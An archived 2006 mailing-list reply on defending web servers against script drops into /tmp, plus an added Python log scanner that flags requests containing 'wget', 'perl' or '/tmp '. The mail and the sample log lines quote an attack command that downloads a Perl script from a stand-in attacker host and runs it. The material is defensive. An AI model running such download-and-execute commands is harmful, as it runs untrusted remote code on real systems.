On Fri, Jun 23, 2006 at 10:08:25AM -0400, Michael Sprague wrote:
> If possible, make /tmp its own file system and mount it with 'noexec'.
> This really helps stop these types of attacks. In fact I would
> recommend 'rw,noexec,nosuid,nodev' as the mount options. Of course if
> you need to have executables in /tmp then this won't work. :)

I used to suggest this too, but to be honest it doesn't work as
well as you'd expect.
Too many exploit attempts run the equivalent of:

    cd /tmp && wget http://evil.example.com/foo.pl
    perl /tmp/foo.pl &

I found blocking "wget", "perl", and "/tmp%20" in requests more
productive - using mod_security.
Steve
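
A log-side version of the filter described in the reply above, as an added example that is not part of the original mail and is not mod_security configuration: it URL-decodes each request target in an access log and reports the three strings named there. The Apache common log format, the sample lines, the function names, and the word-boundary matching (so "perl" does not flag "properly") are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Strings named in the mail, matched after URL-decoding ("/tmp%20" -> "/tmp ").
# Word boundaries are this example's choice, to avoid hits such as "properly".
PATTERNS = {
    "wget": re.compile(r"\bwget\b"),
    "perl": re.compile(r"\bperl\b"),
    "/tmp%20": re.compile(r"/tmp\s"),
}

# Request field of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(target, max_rounds=3):
    """URL-decode until stable (bounded) so nested encoding is normalized."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def match_tokens(target):
    """Return the names of the patterns found in one request target."""
    decoded = decode_fully(target).lower()
    return [name for name, rx in PATTERNS.items() if rx.search(decoded)]


def scan(lines):
    """Return (line_number, matched_names) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and (found := match_tokens(m.group("target"))):
            hits.append((number, found))
    return hits


# Constructed sample lines (documentation addresses, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jun/2006:10:01:02 -0400] "GET /docs/properly.html HTTP/1.1" 200 5120',
    '192.0.2.77 - - [23/Jun/2006:10:02:11 -0400] "GET /page.php?q=cd%20/tmp%20%26%26%20wget%20http://evil.example.com/foo.pl HTTP/1.0" 404 312',
    '192.0.2.77 - - [23/Jun/2006:10:02:12 -0400] "GET /page.php?q=PERL%20/tmp/foo.pl HTTP/1.0" 404 312',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(found)}")
```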